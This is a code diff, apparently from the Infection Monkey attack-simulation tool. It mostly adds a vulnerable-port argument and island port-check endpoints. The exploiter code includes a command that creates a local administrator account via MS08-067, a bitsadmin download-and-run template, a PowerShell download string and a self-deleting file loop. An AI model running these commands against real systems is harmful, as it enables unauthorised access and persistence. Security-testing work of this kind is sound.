ssh.exec_command(cmdline)


@ -41,29 +41,32 @@ def get_target_monkey_by_os(is_windows, is_32bit):
return ControlClient.download_monkey_exe_by_os(is_windows, is_32bit)
def build_monkey_commandline_explicitly(parent=None, tunnel=None, server=None, depth=None, location=None):
def build_monkey_commandline_explicitly(parent=None, tunnel=None, server=None, depth=None, location=None,
vulnerable_port=None):
cmdline = ""
if parent is not None:
cmdline += " -p " + parent
cmdline += f" -p {parent}"
if tunnel is not None:
cmdline += " -t " + tunnel
cmdline += f" -t {tunnel}"
if server is not None:
cmdline += " -s " + server
cmdline += f" -s {server}"
if depth is not None:
if depth < 0:
if int(depth) < 0:
depth = 0
cmdline += " -d %d" % depth
cmdline += f" -d {depth}"
if location is not None:
cmdline += " -l %s" % location
cmdline += f" -l {location}"
if vulnerable_port is not None:
cmdline += f" -vp {vulnerable_port}"
return cmdline
def build_monkey_commandline(target_host, depth, location=None):
def build_monkey_commandline(target_host, depth, vulnerable_port, location=None):
from infection_monkey.config import GUID
return build_monkey_commandline_explicitly(
GUID, target_host.default_tunnel, target_host.default_server, depth, location)
GUID, target_host.default_tunnel, target_host.default_server, depth, location, vulnerable_port)
def get_monkey_depth():


@ -73,6 +73,10 @@ class HTTPTools(object):
lock.acquire()
return "http://%s:%s/%s" % (local_ip, local_port, urllib.parse.quote(os.path.basename(src_path))), httpd
@staticmethod
def get_port_from_url(url: str) -> int:
return urllib.parse.urlparse(url).port
class MonkeyHTTPServer(HTTPTools):
def __init__(self, host):


@ -0,0 +1,28 @@
import unittest
from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly
class TestHelpers(unittest.TestCase):
def test_build_monkey_commandline_explicitly(self):
test1 = " -p 101010 -t 10.10.101.10 -s 127.127.127.127:5000 -d 0 -l C:\\windows\\abc -vp 80"
result1 = build_monkey_commandline_explicitly(101010,
"10.10.101.10",
"127.127.127.127:5000",
0,
"C:\\windows\\abc",
80)
test2 = " -p parent -s 127.127.127.127:5000 -d 0 -vp 80"
result2 = build_monkey_commandline_explicitly(parent="parent",
server="127.127.127.127:5000",
depth="0",
vulnerable_port="80")
self.assertEqual(test1, result1)
self.assertEqual(test2, result2)
if __name__ == '__main__':
unittest.main()


@ -132,7 +132,9 @@ class VSFTPDExploiter(HostExploiter):
T1222Telem(ScanStatus.USED, change_permission.decode(), self.host).send()
# Run monkey on the machine
parameters = build_monkey_commandline(self.host, get_monkey_depth() - 1)
parameters = build_monkey_commandline(self.host,
get_monkey_depth() - 1,
vulnerable_port=FTP_PORT)
run_monkey = RUN_MONKEY % {'monkey_path': monkey_path, 'monkey_type': MONKEY_ARG, 'parameters': parameters}
# Set unlimited to memory


@ -42,6 +42,8 @@ class WebRCE(HostExploiter):
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
self.skip_exist = self._config.skip_exploit_if_file_exist
self.vulnerable_urls = []
self.target_url = None
self.vulnerable_port = None
def get_exploit_config(self):
"""
@ -87,27 +89,30 @@ class WebRCE(HostExploiter):
if not self.vulnerable_urls:
return False
self.target_url = self.vulnerable_urls[0]
self.vulnerable_port = HTTPTools.get_port_from_url(self.target_url)
# Skip if monkey already exists and this option is given
if not exploit_config['blind_exploit'] and self.skip_exist and self.check_remote_files(self.vulnerable_urls[0]):
if not exploit_config['blind_exploit'] and self.skip_exist and self.check_remote_files(self.target_url):
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
return True
# Check for targets architecture (if it's 32 or 64 bit)
if not exploit_config['blind_exploit'] and not self.set_host_arch(self.vulnerable_urls[0]):
if not exploit_config['blind_exploit'] and not self.set_host_arch(self.target_url):
return False
# Upload the right monkey to target
data = self.upload_monkey(self.vulnerable_urls[0], exploit_config['upload_commands'])
data = self.upload_monkey(self.target_url, exploit_config['upload_commands'])
if data is False:
return False
# Change permissions to transform monkey into executable file
if self.change_permissions(self.vulnerable_urls[0], data['path']) is False:
if self.change_permissions(self.target_url, data['path']) is False:
return False
# Execute remote monkey
if self.execute_remote_monkey(self.vulnerable_urls[0], data['path'], exploit_config['dropper']) is False:
if self.execute_remote_monkey(self.target_url, data['path'], exploit_config['dropper']) is False:
return False
return True
@ -403,10 +408,15 @@ class WebRCE(HostExploiter):
default_path = self.get_default_dropper_path()
if default_path is False:
return False
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, default_path)
monkey_cmd = build_monkey_commandline(self.host,
get_monkey_depth() - 1,
self.vulnerable_port,
default_path)
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd}
else:
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
monkey_cmd = build_monkey_commandline(self.host,
get_monkey_depth() - 1,
self.vulnerable_port)
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd}
try:
LOG.info("Trying to execute monkey using command: {}".format(command))
@ -489,3 +499,6 @@ class WebRCE(HostExploiter):
except KeyError:
LOG.debug("Target's machine type was not set. Using win-32 dropper path.")
return self._config.dropper_target_path_win_32
def set_vulnerable_port_from_url(self, url):
self.vulnerable_port = HTTPTools.get_port_from_url(url)


@ -4,7 +4,6 @@ import time
import copy
from requests import post, exceptions
from http.server import BaseHTTPRequestHandler, HTTPServer
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.exploit.HostExploiter import HostExploiter


@ -193,9 +193,9 @@ class Ms08_067_Exploiter(HostExploiter):
sock.send("cmd /c (net user {} {} /add) &&"
" (net localgroup administrators {} /add)\r\n".format(
self._config.user_to_add,
self._config.remote_user_pass,
self._config.user_to_add).encode())
time.sleep(2)
reply = sock.recv(1000)
@ -234,11 +234,15 @@ class Ms08_067_Exploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1,
build_monkey_commandline(self.host,
get_monkey_depth() - 1,
SRVSVC_Exploit.TELNET_PORT,
self._config.dropper_target_path_win_32)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1)
build_monkey_commandline(self.host,
get_monkey_depth() - 1,
vulnerable_port=SRVSVC_Exploit.TELNET_PORT)
try:
sock.send("start %s\r\n" % (cmdline,))


@ -21,6 +21,7 @@ class WmiExploiter(HostExploiter):
_TARGET_OS_TYPE = ['windows']
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
_EXPLOITED_SERVICE = 'WMI (Windows Management Instrumentation)'
VULNERABLE_PORT = 135
def __init__(self, host):
super(WmiExploiter, self).__init__(host)
@ -94,11 +95,15 @@ class WmiExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(
self.host, get_monkey_depth() - 1, self._config.dropper_target_path_win_32)
build_monkey_commandline(self.host,
get_monkey_depth() - 1,
WmiExploiter.VULNERABLE_PORT,
self._config.dropper_target_path_win_32)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1)
build_monkey_commandline(self.host,
get_monkey_depth() - 1,
WmiExploiter.VULNERABLE_PORT)
# execute the remote monkey
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,


@ -14,10 +14,10 @@ MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG,)
GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)'
DROPPER_CMDLINE_DETACHED_WINDOWS = '%s start cmd /c %%(dropper_path)s %s' % (CMD_PREFIX, DROPPER_ARG,)
MONKEY_CMDLINE_DETACHED_WINDOWS = '%s start cmd /c %%(monkey_path)s %s' % (CMD_PREFIX, MONKEY_ARG,)
MONKEY_CMDLINE_HTTP = '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd ' \
'/c %%(monkey_path)s %s"' % (CMD_PREFIX, MONKEY_ARG,)
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(' \
'file_path)s exit)) > NUL 2>&1 '
MONKEY_CMDLINE_HTTP = '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s' \
'&cmd /c %%(monkey_path)s %s"' % (CMD_PREFIX, MONKEY_ARG,)
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & ' \
'if not exist %(file_path)s exit)) > NUL 2>&1 '
# Commands used for downloading monkeys
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(" \


@ -10,6 +10,7 @@ from infection_monkey.network.HostFinger import HostFinger
from infection_monkey.utils.monkey_dir import create_monkey_dir, get_monkey_dir_path, remove_monkey_dir
from infection_monkey.utils.monkey_log_path import get_monkey_log_path
from infection_monkey.utils.environment import is_windows_os
from infection_monkey.utils.exceptions.planned_shutdown_exception import PlannedShutdownException
from infection_monkey.config import WormConfiguration
from infection_monkey.control import ControlClient
from infection_monkey.model import DELAY_DELETE_CMD
@ -26,12 +27,13 @@ from infection_monkey.telemetry.trace_telem import TraceTelem
from infection_monkey.telemetry.tunnel_telem import TunnelTelem
from infection_monkey.windows_upgrader import WindowsUpgrader
from infection_monkey.post_breach.post_breach_handler import PostBreach
from infection_monkey.network.tools import get_interface_to_target
from infection_monkey.network.tools import get_interface_to_target, is_running_on_server
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError, FailedExploitationError
from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
from common.utils.attack_utils import ScanStatus, UsageEnum
from common.version import get_version
from infection_monkey.exploit.HostExploiter import HostExploiter
from common.network.network_utils import get_host_from_network_location
MAX_DEPTH_REACHED_MESSAGE = "Reached max depth, shutting down"
@ -40,10 +42,6 @@ __author__ = 'itamar'
LOG = logging.getLogger(__name__)
class PlannedShutdownException(Exception):
pass
class InfectionMonkey(object):
def __init__(self, args):
self._keep_running = False
@ -74,14 +72,20 @@ class InfectionMonkey(object):
arg_parser.add_argument('-t', '--tunnel')
arg_parser.add_argument('-s', '--server')
arg_parser.add_argument('-d', '--depth', type=int)
arg_parser.add_argument('-vp', '--vulnerable-port')
self._opts, self._args = arg_parser.parse_known_args(self._args)
self.log_arguments()
self._parent = self._opts.parent
self._default_tunnel = self._opts.tunnel
self._default_server = self._opts.server
if self._opts.depth:
if self._opts.depth is not None:
WormConfiguration._depth_from_commandline = True
WormConfiguration.depth = self._opts.depth
LOG.debug(f"Setting propagation depth from command line")
LOG.debug(f"Set propagation depth to {WormConfiguration.depth}")
self._keep_running = True
self._network = NetworkScanner()
self._dropper_path = sys.argv[0]
@ -115,6 +119,10 @@ class InfectionMonkey(object):
self.shutdown_by_not_alive_config()
if self.is_started_on_island():
ControlClient.report_start_on_island()
ControlClient.should_monkey_run(self._opts.vulnerable_port)
if firewall.is_enabled():
firewall.add_firewall_rule()
@ -376,3 +384,11 @@ class InfectionMonkey(object):
raise PlannedShutdownException("Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel))
self._default_server = WormConfiguration.current_server
LOG.debug("default server set to: %s" % self._default_server)
def is_started_on_island(self):
island_ip = get_host_from_network_location(self._default_server)
return is_running_on_server(island_ip) and WormConfiguration.depth == WormConfiguration.max_depth
def log_arguments(self):
arg_string = " ".join([f"{key}: {value}" for key, value in vars(self._opts).items()])
LOG.info(f"Monkey started with arguments: {arg_string}")
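Editor's note: the depth bookkeeping above is easier to follow with concrete numbers. max_depth is fixed by the configuration, every exploiter passes get_monkey_depth() - 1 to the next agent, and get_hop_distance_to_island() is simply max_depth - depth. A small illustrative sketch; the value 2 is just an example depth setting:

MAX_DEPTH = 2  # example value of the depth configuration option

def hop_distance_to_island(current_depth: int) -> int:
    # Mirrors WormConfiguration.get_hop_distance_to_island()
    return MAX_DEPTH - current_depth

# depth equals max_depth on the island itself and is decremented on every hop:
for depth in (2, 1, 0):
    print(f"depth={depth} -> distance from island: {hop_distance_to_island(depth)}")

# should_monkey_run() only aborts when a vulnerable port was passed on the
# command line, this distance is greater than 1, the run started on the island,
# and the island can still reach that port directly.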

View File

@ -51,18 +51,15 @@ if is_windows_os():
local_hostname = socket.gethostname()
return socket.gethostbyname_ex(local_hostname)[2]
def get_routes():
raise NotImplementedError()
else:
from fcntl import ioctl
def local_ips():
valid_ips = [network['addr'] for network in get_host_subnets()]
return valid_ips
def get_routes(): # based on scapy implementation for route parsing
try:
f = open("/proc/net/route", "r")


@ -7,7 +7,6 @@ import sys
import infection_monkey.config
from infection_monkey.network.HostFinger import HostFinger
from infection_monkey.network.HostScanner import HostScanner
from infection_monkey.model.host import VictimHost
__author__ = 'itamar'


@ -7,7 +7,7 @@ import struct
import time
import re
from infection_monkey.network.info import get_routes
from infection_monkey.network.info import get_routes, local_ips
from infection_monkey.pyinstaller_utils import get_binary_file_path
from infection_monkey.utils.environment import is_64bit_python
@ -309,3 +309,7 @@ def get_interface_to_target(dst):
paths.sort()
ret = paths[-1][1]
return ret[1]
def is_running_on_server(ip: str) -> bool:
return ip in local_ips()


@ -13,8 +13,7 @@ ipaddress
# See breaking change here: https://github.com/tjguk/wmi/commit/dcf8e3eca79bb8c0101ffb83e25c066b0ba9e16d
# Causes pip to error with:
# Could not find a version that satisfies the requirement pywin32 (from wmi->-r /src/infection_monkey/requirements.txt (line 12)) (from versions: none)
wmi==1.4.9
pywin32 ; sys_platform == 'win32'
wmi==1.4.9 ; sys_platform == 'win32'
pymssql<3.0
pyftpdlib
WinSys-3.x
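Editor's note: the requirements change above relies on a PEP 508 environment marker, so pip only installs pywin32 and wmi when running on Windows. If in doubt about how a marker evaluates, the packaging library (already used elsewhere in this PR) exposes the same logic; a small illustrative sketch:

from packaging.markers import Marker

marker = Marker("sys_platform == 'win32'")
# True when evaluated on Windows, False on Linux/macOS; pip applies the same
# rule when deciding whether to install a requirement guarded by this marker.
print(marker.evaluate())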


@ -1,5 +1,4 @@
import logging
import socket
import sys
import psutil


@ -1,3 +1 @@
from infection_monkey.transport.http import HTTPServer, LockedHTTPServer
__author__ = 'hoffer'


@ -0,0 +1,2 @@
class PlannedShutdownException(Exception):
pass


@ -73,7 +73,6 @@ class AutoNewWindowsUser(AutoNewUser):
def run_as(self, command):
# Importing these only on windows, as they won't exist on linux.
import win32con
import win32process
import win32api
import win32event


@ -16,10 +16,12 @@ from monkey_island.cc.resources.island_logs import IslandLog
from monkey_island.cc.resources.monkey import Monkey
from monkey_island.cc.resources.monkey_configuration import MonkeyConfiguration
from monkey_island.cc.resources.island_configuration import IslandConfiguration
from monkey_island.cc.resources.monkey_control.started_on_island import StartedOnIsland
from monkey_island.cc.resources.monkey_download import MonkeyDownload
from monkey_island.cc.resources.netmap import NetMap
from monkey_island.cc.resources.node import Node
from monkey_island.cc.resources.node_states import NodeStates
from monkey_island.cc.resources.monkey_control.remote_port_check import RemotePortCheck
from monkey_island.cc.resources.remote_run import RemoteRun
from monkey_island.cc.resources.reporting.report import Report
from monkey_island.cc.resources.root import Root
@ -32,6 +34,7 @@ from monkey_island.cc.resources.pba_file_upload import FileUpload
from monkey_island.cc.resources.attack.attack_config import AttackConfiguration
from monkey_island.cc.resources.attack.attack_report import AttackReport
from monkey_island.cc.resources.bootloader import Bootloader
from monkey_island.cc.resources.zero_trust.finding_event import ZeroTrustFindingEvent
from monkey_island.cc.services.database import Database
from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService
from monkey_island.cc.services.representations import output_json
@ -107,6 +110,7 @@ def init_api_resources(api):
Report,
'/api/report/<string:report_type>',
'/api/report/<string:report_type>/<string:report_data>')
api.add_resource(ZeroTrustFindingEvent, '/api/zero-trust/finding-event/<string:finding_id>')
api.add_resource(TelemetryFeed, '/api/telemetry-feed', '/api/telemetry-feed/')
api.add_resource(Log, '/api/log', '/api/log/')
@ -119,6 +123,8 @@ def init_api_resources(api):
api.add_resource(AttackConfiguration, '/api/attack')
api.add_resource(AttackReport, '/api/attack/report')
api.add_resource(VersionUpdate, '/api/version-update', '/api/version-update/')
api.add_resource(RemotePortCheck, '/api/monkey_control/check_remote_port/<string:port>')
api.add_resource(StartedOnIsland, '/api/monkey_control/started_on_island')
api.add_resource(MonkeyTest, '/api/test/monkey')
api.add_resource(ClearCaches, '/api/test/clear_caches')


@ -10,7 +10,7 @@ import pymongo
from monkey_island.cc.environment import Environment
# Disable "unverified certificate" warnings when sending requests to island
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # noqa: DUO131
logger = logging.getLogger(__name__)
@ -29,7 +29,9 @@ class BootloaderHTTPRequestHandler(BaseHTTPRequestHandler):
post_data = self.rfile.read(content_length).decode()
island_server_path = BootloaderHTTPRequestHandler.get_bootloader_resource_url(self.request.getsockname()[0])
island_server_path = parse.urljoin(island_server_path, self.path[1:])
r = requests.post(url=island_server_path, data=post_data, verify=False)
# The island server doesn't always have a correct SSL cert installed (by default it comes with a self-signed one),
# which is why we're not verifying the cert in this request.
r = requests.post(url=island_server_path, data=post_data, verify=False) # noqa: DUO123
try:
if r.status_code != 200:
@ -46,4 +48,3 @@ class BootloaderHTTPRequestHandler(BaseHTTPRequestHandler):
@staticmethod
def get_bootloader_resource_url(server_ip):
return "https://" + server_ip + ":" + str(Environment._ISLAND_PORT) + "/api/bootloader/"


@ -9,7 +9,8 @@ class TestAwsEnvironment(IslandTestCase):
def test_get_auth_users(self):
env = AwsEnvironment()
# This is "injecting" the instance id to the env. This is because the UTs aren't always executed on the same AWS machine
# (might not be an AWS machine at all). Perhaps it would have been more elegant to create a Mock, but not worth it for
# (might not be an AWS machine at all).
# Perhaps it would have been more elegant to create a Mock, but not worth it for
# this small test.
env._instance_id = "i-666"
hash_obj = hashlib.sha3_512()
@ -22,5 +23,3 @@ class TestAwsEnvironment(IslandTestCase):
assert auth_user.id == 1
assert auth_user.username == "monkey"
assert auth_user.secret == hash_obj.hexdigest()


@ -22,7 +22,7 @@ logger = logging.getLogger(__name__)
from monkey_island.cc.app import init_app
from monkey_island.cc.services.reporting.exporter_init import populate_exporter_list
from monkey_island.cc.utils import local_ip_addresses
from monkey_island.cc.network_utils import local_ip_addresses
from monkey_island.cc.environment.environment import env
from monkey_island.cc.database import is_db_server_up, get_db_version
from monkey_island.cc.resources.monkey_download import MonkeyDownload


@ -12,9 +12,9 @@ else:
connect(db=env.mongo_db_name, host=env.mongo_db_host, port=env.mongo_db_port)
# Order of importing matters here, for registering the embedded and referenced documents before using them.
from .config import Config
from .creds import Creds
from .monkey_ttl import MonkeyTtl
from .pba_results import PbaResults
from .command_control_channel import CommandControlChannel
from .monkey import Monkey
from .config import Config # noqa: F401
from .creds import Creds # noqa: F401
from .monkey_ttl import MonkeyTtl # noqa: F401
from .pba_results import PbaResults # noqa: F401
from .command_control_channel import CommandControlChannel # noqa: F401
from .monkey import Monkey # noqa: F401


@ -16,4 +16,3 @@ class Mitigation(EmbeddedDocument):
description = mitigation['description']
url = MitreApiInterface.get_stix2_external_reference_url(mitigation)
return Mitigation(name=name, description=description, url=url)


@ -8,7 +8,7 @@ import ring
from monkey_island.cc.models.monkey_ttl import MonkeyTtl, create_monkey_ttl_document
from monkey_island.cc.consts import DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS
from monkey_island.cc.models.command_control_channel import CommandControlChannel
from monkey_island.cc.utils import local_ip_addresses
from monkey_island.cc.network_utils import local_ip_addresses
from common.cloud import environment_names
MAX_MONKEYS_AMOUNT_TO_CACHE = 100


@ -13,8 +13,8 @@ logger = logging.getLogger(__name__)
class TestMonkey(IslandTestCase):
"""
Make sure to set server environment to `testing` in server_config.json! Otherwise this will mess up your mongo instance and
won't work.
Make sure to set server environment to `testing` in server_config.json!
Otherwise this will mess up your mongo instance and won't work.
Also, the working directory needs to be the working directory from which you usually run the island so the
server_config.json file is found and loaded.


@ -0,0 +1,13 @@
"""
Define a Document Schema for the TestTelem document.
"""
from mongoengine import Document, StringField, DateTimeField
class TestTelem(Document):
# SCHEMA
name = StringField(required=True)
time = DateTimeField(required=True)
method = StringField(required=True)
endpoint = StringField(required=True)
content = StringField(required=True)


@ -12,7 +12,7 @@ class AggregateFinding(Finding):
:raises: Assertion error if this is used when there's more than one finding which fits the query - this is not
how this function should be used.
"""
existing_findings = Finding.objects(test=test, status=status)
existing_findings = Finding.objects(test=test, status=status).exclude('events')
assert (len(existing_findings) < 2), "More than one finding exists for {}:{}".format(test, status)
if len(existing_findings) == 0:
@ -21,7 +21,6 @@ class AggregateFinding(Finding):
# Now we know for sure this is the only one
orig_finding = existing_findings[0]
orig_finding.add_events(events)
orig_finding.save()
def add_malicious_activity_to_timeline(events):


@ -23,7 +23,9 @@ class Event(EmbeddedDocument):
# LOGIC
@staticmethod
def create_event(title, message, event_type, timestamp=datetime.now()):
def create_event(title, message, event_type, timestamp=None):
if not timestamp:
timestamp = datetime.now()
event = Event(
timestamp=timestamp,
title=title,

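Editor's note: the create_event change above fixes the classic Python default-argument pitfall. The old default timestamp=datetime.now() is evaluated once, when the function is defined, so every event created with the default would have shared the same import-time timestamp; resolving a None default inside the body evaluates datetime.now() on every call. A small illustrative reproduction, not part of this diff:

import time
from datetime import datetime

def bad(timestamp=datetime.now()):  # default evaluated once, at definition time
    return timestamp

def good(timestamp=None):  # default resolved on every call
    if not timestamp:
        timestamp = datetime.now()
    return timestamp

print(bad(), good())
time.sleep(1)
print(bad(), good())  # bad() repeats the first timestamp; good() has advanced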

@ -2,6 +2,7 @@
"""
Define a Document Schema for Zero Trust findings.
"""
from typing import List
from mongoengine import Document, StringField, EmbeddedDocumentListField
@ -55,6 +56,5 @@ class Finding(Document):
return finding
def add_events(self, events):
# type: (list) -> None
self.events.extend(events)
def add_events(self, events: List) -> None:
self.update(push_all__events=events)


@ -1,3 +1,8 @@
import unittest
from packaging import version
import mongomock
import common.data.zero_trust_consts as zero_trust_consts
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
from monkey_island.cc.models.zero_trust.event import Event
@ -6,6 +11,9 @@ from monkey_island.cc.testing.IslandTestCase import IslandTestCase
class TestAggregateFinding(IslandTestCase):
@unittest.skipIf(version.parse(mongomock.__version__) <= version.parse("3.19.0"),
"mongomock version doesn't support this test")
def test_create_or_add_to_existing(self):
self.fail_if_not_testing_env()
self.clean_finding_db()
@ -25,6 +33,8 @@ class TestAggregateFinding(IslandTestCase):
self.assertEqual(len(Finding.objects(test=test, status=status)), 1)
self.assertEqual(len(Finding.objects(test=test, status=status)[0].events), 2)
@unittest.skipIf(version.parse(mongomock.__version__) <= version.parse("3.19.0"),
"mongomock version doesn't support this test")
def test_create_or_add_to_existing_2_tests_already_exist(self):
self.fail_if_not_testing_env()
self.clean_finding_db()


@ -33,7 +33,8 @@ class TestFinding(IslandTestCase):
event_example = Event.create_event(
title="Event Title", message="event message", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK)
Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED, events=[event_example])
Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION,
status=zero_trust_consts.STATUS_FAILED, events=[event_example])
self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 1)
self.assertEqual(len(Finding.objects(status=zero_trust_consts.STATUS_FAILED)), 1)


@ -1,12 +1,11 @@
import array
import collections
import ipaddress
import socket
import struct
import sys
from typing import List
import collections
import array
import struct
import ipaddress
from netifaces import interfaces, ifaddresses, AF_INET
from ring import lru
@ -20,7 +19,6 @@ if sys.platform == "win32":
else:
import fcntl
def local_ips():
result = []
try:


@ -1,7 +1,6 @@
from unittest import TestCase
from monkey_island.cc.resources.bootloader import Bootloader
from monkey_island.cc.services.utils.bootloader_config import SUPPORTED_WINDOWS_VERSIONS
class TestBootloader(TestCase):


@ -10,7 +10,7 @@ from monkey_island.cc.environment.environment import env
from monkey_island.cc.models import Monkey
from monkey_island.cc.resources.monkey_download import get_monkey_executable
from monkey_island.cc.services.node import NodeService
from monkey_island.cc.utils import local_ip_addresses
from monkey_island.cc.network_utils import local_ip_addresses
from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH
__author__ = 'Barak'


@ -6,6 +6,7 @@ from flask import request
from monkey_island.cc.auth import jwt_required
from monkey_island.cc.database import mongo
from monkey_island.cc.resources.test.utils.telem_store import TestTelemStore
from monkey_island.cc.services.log import LogService
from monkey_island.cc.services.node import NodeService
@ -23,6 +24,7 @@ class Log(flask_restful.Resource):
return LogService.log_exists(ObjectId(exists_monkey_id))
# Used by monkey. can't secure.
@TestTelemStore.store_test_telem
def post(self):
telemetry_json = json.loads(request.data)


@ -3,6 +3,7 @@ from datetime import datetime
import dateutil.parser
import flask_restful
from monkey_island.cc.resources.test.utils.telem_store import TestTelemStore
from flask import request
from monkey_island.cc.consts import DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS
@ -33,6 +34,7 @@ class Monkey(flask_restful.Resource):
return {}
# Used by monkey. can't secure.
@TestTelemStore.store_test_telem
def patch(self, guid):
monkey_json = json.loads(request.data)
update = {"$set": {'modifytime': datetime.now()}}
@ -56,6 +58,8 @@ class Monkey(flask_restful.Resource):
return mongo.db.monkey.update({"_id": monkey["_id"]}, update, upsert=False)
# Used by monkey. can't secure.
# Called on monkey wakeup to initialize local configuration
@TestTelemStore.store_test_telem
def post(self, **kw):
monkey_json = json.loads(request.data)
monkey_json['creds'] = []
@ -71,16 +75,11 @@ class Monkey(flask_restful.Resource):
# if new monkey telem, change config according to "new monkeys" config.
db_monkey = mongo.db.monkey.find_one({"guid": monkey_json["guid"]})
if not db_monkey:
# we pull it encrypted because we then decrypt it for the monkey in get
new_config = ConfigService.get_flat_config(False, False)
monkey_json['config'] = monkey_json.get('config', {})
monkey_json['config'].update(new_config)
else:
db_config = db_monkey.get('config', {})
if 'current_server' in db_config:
del db_config['current_server']
monkey_json.get('config', {}).update(db_config)
# Update monkey configuration
new_config = ConfigService.get_flat_config(False, False)
monkey_json['config'] = monkey_json.get('config', {})
monkey_json['config'].update(new_config)
# try to find new monkey parent
parent = monkey_json.get('parent')


@ -0,0 +1,14 @@
import flask_restful
from flask import request
from monkey_island.cc.services.remote_port_check import check_tcp_port
class RemotePortCheck(flask_restful.Resource):
# Used by monkey. can't secure.
def get(self, port):
if port and check_tcp_port(request.remote_addr, port):
return {"status": "port_visible"}
else:
return {"status": "port_invisible"}


@ -0,0 +1,16 @@
import json
import flask_restful
from flask import request, make_response
from monkey_island.cc.services.config import ConfigService
class StartedOnIsland(flask_restful.Resource):
# Used by monkey. can't secure.
def post(self):
data = json.loads(request.data)
if data['started_on_island']:
ConfigService.set_started_on_island(True)
return make_response({}, 200)


@ -1,4 +1,3 @@
from flask import request
import flask_restful
from monkey_island.cc.auth import jwt_required


@ -1,6 +1,5 @@
import logging
import threading
from datetime import datetime
import flask_restful
from flask import request, make_response, jsonify
@ -8,11 +7,8 @@ from flask import request, make_response, jsonify
from monkey_island.cc.auth import jwt_required
from monkey_island.cc.database import mongo
from monkey_island.cc.services.database import Database
from monkey_island.cc.services.node import NodeService
from monkey_island.cc.services.reporting.report import ReportService
from monkey_island.cc.services.reporting.report_generation_synchronisation import is_report_being_generated, \
safe_generate_reports
from monkey_island.cc.utils import local_ip_addresses
from monkey_island.cc.services.infection_lifecycle import InfectionLifecycle
from monkey_island.cc.network_utils import local_ip_addresses
__author__ = 'Barak'
@ -32,7 +28,7 @@ class Root(flask_restful.Resource):
elif action == "reset":
return jwt_required()(Database.reset_db)()
elif action == "killall":
return Root.kill_all()
return jwt_required()(InfectionLifecycle.kill_all)()
elif action == "is-up":
return {'is-up': True}
else:
@ -43,33 +39,6 @@ class Root(flask_restful.Resource):
return jsonify(
ip_addresses=local_ip_addresses(),
mongo=str(mongo.db),
completed_steps=self.get_completed_steps())
completed_steps=InfectionLifecycle.get_completed_steps())
@staticmethod
@jwt_required()
def kill_all():
mongo.db.monkey.update({'dead': False}, {'$set': {'config.alive': False, 'modifytime': datetime.now()}},
upsert=False,
multi=True)
logger.info('Kill all monkeys was called')
return jsonify(status='OK')
@jwt_required()
def get_completed_steps(self):
is_any_exists = NodeService.is_any_monkey_exists()
infection_done = NodeService.is_monkey_finished_running()
if infection_done:
# Checking is_report_being_generated here, because we don't want to wait to generate a report; rather,
# we want to skip and reply.
if not is_report_being_generated() and not ReportService.is_latest_report_exists():
safe_generate_reports()
report_done = ReportService.is_report_generated()
else: # Infection is not done
report_done = False
return dict(
run_server=True,
run_monkey=is_any_exists,
infection_done=infection_done,
report_done=report_done)


@ -8,6 +8,7 @@ from flask import request
from monkey_island.cc.auth import jwt_required
from monkey_island.cc.database import mongo
from monkey_island.cc.resources.test.utils.telem_store import TestTelemStore
from monkey_island.cc.services.node import NodeService
from monkey_island.cc.services.telemetry.processing.processing import process_telemetry
from monkey_island.cc.models.monkey import Monkey
@ -40,6 +41,7 @@ class Telemetry(flask_restful.Resource):
return result
# Used by monkey. can't secure.
@TestTelemStore.store_test_telem
def post(self):
telemetry_json = json.loads(request.data)
telemetry_json['timestamp'] = datetime.now()


@ -0,0 +1,71 @@
import logging
from functools import wraps
from os import mkdir, path
import shutil
from datetime import datetime
from flask import request
